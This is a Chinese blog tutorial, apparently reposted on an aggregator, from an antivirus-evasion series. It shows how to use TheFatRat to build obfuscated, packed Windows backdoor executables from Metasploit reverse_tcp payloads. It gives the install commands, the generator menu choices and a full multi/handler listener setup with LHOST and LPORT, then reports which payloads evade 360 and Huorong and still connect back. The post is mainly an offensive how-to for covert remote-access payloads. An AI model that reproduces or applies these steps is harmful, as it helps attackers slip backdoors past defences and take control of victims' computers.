远控免杀专题10--TheFatRat免杀

news/2024/12/2 14:58:42/

0x01 免杀能力一览表

在这里插入图片描述
几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

0x02 TheFatRat介绍

TheFatRat创建的后门或者payload,可以在Linux,Windows,Mac和Android上等多种平台上执行,可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接,并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具,对powershell的免杀姿势尤其多样。

0x03 安装TheFatRat

推荐使用linux操作系统,如Kali、Parrot、Dracos、BackTrack、Backbox等

3.1Github安装

安装比较简单,首先从github上clone下来

然后进入TheFatRat目录


cd TheFatRat

执行安装命令

chmod +x setup.sh && ./setup.sh

在成功安装后,可以查看TheFatRat/logs目录下的setup.log文件,里面是TheFatRat需要的一些软件和环境。
在这里插入图片描述

3、2 软件升级

作者提供了升级的命令,可直接升级软件


./update && chmod + x setup.sh && ./setup.sh

0x04 TheFatRat使用说明

在安装完成后,使用命令fatrat即可执行,启动略慢。TheFatRat和专题9里的Avet一样,也默认不允许远程连接后执行,只能在linux主机内执行。
在这里插入图片描述

运行时会检测一些软件或环境是否已经安装
在这里插入图片描述
同时还会有个界面提醒大家不要把生成的后门上传到virustotal.com上面,可以上传到nodistribute.com(专门试了下,但上传样本一直不成功)。
在这里插入图片描述
之后就能看到启动后的界面了
在这里插入图片描述
常用创建后门菜单如下,我自己翻译解释了一下,有个别可能不太准确。


[01]  Create Backdoor with msfvenom 
#01:直接利用msf来生产后门,基本不能免杀[02]  Create Fud 100% Backdoor with Fudwin 1.0
#02:使用Fudwin 1.0创建powershell后门,ps1利用powerstager混淆,从结果来看效果不错[03]  Create Fud Backdoor with Avoid v1.2  
# 03: 使用Avoid v1.2创建后门[04]  Create Fud Backdoor with backdoor-factory [embed] 
#04:使用backdoor-factory创建后门[05]  Backdooring Original apk [Instagram, Line,etc] 
#05:生成安卓使用的apk后门[06]  Create Fud Backdoor 1000% with PwnWinds [Excelent] 
#06:综合了多种方式,可生成bat、exe、dll、ps1等,可利用c、C#多种语言编译,官方非常推荐,但经尝试免杀效果一般,肯定是被杀软列入特征库了[07]  Create Backdoor For Office with Microsploit 
#07:生成office类后门[08]  Trojan Debian Package For Remote Access [Trodebi]
#08:生成linux后门

由于01是直接调用了msfvenom生成payload,只不过稍微进行了多个msfvenom编码,免杀效果肯定一般。
[01] Create Backdoor with msfvenom生成过程如下:
在这里插入图片描述
我这里就直接使用官方推荐的2和6进行测试了。

0x05 使用TheFatRat生成ps1-exe

在主菜单选择2,进入[02] Create Fud 100% Backdoor with Fudwin 1.0,选择1,利用powerstager混淆,并将powershell编译成exe。
在这里插入图片描述
在这里插入图片描述
在生成过程中可能会报错,如下所示
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这样就生成成功了。

在我本地机器上监听5555端口


use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.211.55.2
set LPORT 3333
exploit -j

在测试机器上执行payload.exe,生成的payload.exe图中目录下
在这里插入图片描述
打开杀软进行测试,虽然火绒静态查杀没查出来,不过行为检测查杀到了。360静态和动态都能查杀。(病毒库均已更新到2020.01.01)
在这里插入图片描述

0x06 使用TheFatRat生成加壳exe

在主菜单选择2,进入[02] Create Fud 100% Backdoor with Fudwin 1.0,选择2,slow but powerfull(慢但是有效)
在这里插入图片描述

输入监听ip和端口后,可能会报错,也可能解密界面都消失,但其实后台还在运行.
在这里插入图片描述

看免杀过程,应该是msfvenom一定编码后进行upx加壳,可能还有其他处理,想了解详细过程的可以看下源码。

等一段时间后,在/root/Fatrat_Generated/目录下会发现生成了Powerfull.exe和Powerfull-fud.exe。
在这里插入图片描述

在测试机器运行,火绒静态动态都可查杀,可正常上线
在这里插入图片描述
360动态和静态都没有反应
在这里插入图片描述

0x07 使用TheFatRat编译C#+powershell生成exe

尝试官方比较推荐的第6种方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],进入后菜单如下,我选择2使用c#+powershell来生成exe
在这里插入图片描述
配置好ip、端口和文件名,选择好监听payload
在这里插入图片描述
生成成功
在这里插入图片描述
可正常上线
在这里插入图片描述
打开杀软,静态检测没问题,但行为检测时360和火绒都报预警了。
在这里插入图片描述

0x08 小结

TheFatRat创建的后门格式和支持的平台比较多样化,而且还支持生成CDROM/U盘中能自动运行(生成AutoRun文件)的后门文件,并且可以对payload更改图标,具有一定伪装效果。

TheFatRat的很多免杀方式是借助于msfvenom编码、upx等加壳压缩、c/c#编译等将powershell混淆后编译成exe或bat文件,但有些在执行时还是会调用powershell,而powershell的调用已经被各大杀软盯的很紧了,所以查杀效果只能算是一般了。

由于使用TheFatRat生成了多种payload,免杀效果各不相同,我就选了个折中一些的22/70作为TheFatRat的免杀代表。

0x09 参考资料

TheFatRat 一款简易后门工具:https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f

TheFatRat – 跨平台反弹后门Shell生成神器:http://caidaome.com/?post=198


http://www.ppmy.cn/news/399794.html

相关文章

iOS7系统iLEX RAT冬青鼠安装教程:无需刷机还原纯净越狱系统

全网科技 温馨提醒:iLEX RAT和Semi-Restore的作用都是让你的已越狱的设备恢复至越狱的初始状态。 可是要注意无论你是用iLexRAT冬青鼠还是Semi-restore。对于还原来说都存在巨大的风险。非必要情况下,还是不要任意使用它们。 *iLEX RAT冬青鼠安装教程&am…

SystemUI---RAT

System UI的内容很多,包括状态栏、通知栏、锁屏、Navigation bar和Recent等;本篇主要分析状态栏中的RAT图标、数据图标以及信号格的更新。每一个新版本,Google都会对这一块进行修改,所以不同版本之间会有些差异,本篇内容是基于And…

物联网威胁监测系统最新发现一款针对IoT设备的RAT远控木马

一、背景概述 2022年7月20日,天穹威胁监测系统监测到IoT蜜罐系统中的D-Link Dir 817LW路由器遭受来自澳大利亚IP的攻击。系统显示目标设备被攻击成功,并且下载了恶意样本。实验室相关人员第一时间对该攻击事件样本进行分析,发现该次攻击投递…

98rat_如何使用E4rat将Linux PC的启动时间缩短一半

98rat Linux is pretty quick to boot on modern computers, but why not pare it down some more? If you’re hurting from a lack of SSD or just want to boot faster, E4rat will easily shave down your boot time. Linux可以在现代计算机上快速启动,但是为什…

Text-to-SQL---RAT-SQL模型

RAT-SQL RAT-SQL(Relation-Aware Transformer-SQL)是微软在2020 ACL发表的论文RAT-SQL: Relation-Aware Schema Encoding and Linking for Text-to-SQL Parsers 提出的模型,这个模型在Spider数据集上的结果为65.6%。RAT-SQL代码的地址为https://github.com/Microso…

kali-TheFatRat木马生成工具安装及简单使用

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载&a…

Matlab中format rat的意思(补充说明format函数用法)

format rat :使用分数来表示数值 例如 >> a0.25a 0.2500>> format rat>> aa 1/4补充说明MATLAB中format函数在控制输出格式中的使用方法 format 默认格式 format short 5字长定点数 format long 15字长定点数 format short e 5字长浮点数 for…

Efficient Global 2D-3D Matching for Camera Localization in a Large-Scale 3D Map

文章目录 Efficient Global 2D-3D Matching for Camera Localization in a Large-Scale 3D Map1. 相似源码choose_solution.pyeight_point.pyepipolar_match.py Efficient Global 2D-3D Matching for Camera Localization in a Large-Scale 3D Map 1. 相似源码 由于paper并没…